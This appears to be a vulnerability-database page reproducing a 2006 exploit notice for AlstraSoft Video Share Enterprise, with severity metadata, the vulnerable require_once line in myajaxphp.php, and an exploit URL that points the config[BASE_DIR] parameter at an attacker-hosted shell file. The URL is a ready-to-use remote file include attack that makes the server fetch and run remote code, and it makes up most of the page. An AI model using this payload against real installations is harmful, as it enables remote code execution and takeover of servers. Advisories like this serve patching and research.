AlstraSoft Video Share Enterprise Remote File Include Vulnerability

CVE	Category	Price	Severity
N/A	CWE-98	N/A	High

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2006-09-04

CPE
cpe:cpe:/a:alstrasoft:video_share_enterprise

CVSS	EPSS	EPSSP
CVSS:7.5/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H	0.78773	0.89185

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080176

Below is a copy:

##Night_Warrior<Kurdish Hacker>

##night_warrior-[at]hotmail.com

##AlstraSoft Video Share Enterprise Remote File Include Vulnerability

##Contact : night_warrior-[at]hotmail.com

##hompage : www.alstrasoft.com

##vuln code :

myajaxphp.php line 11

require_once($config['BASE_DIR'] . "/ajax/cpaint2.inc.php");

http://www.example.com/[Script Path]/ajax/myajaxphp.php?config[BASE_DIR]=http://atacker.com/shell.txt?

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum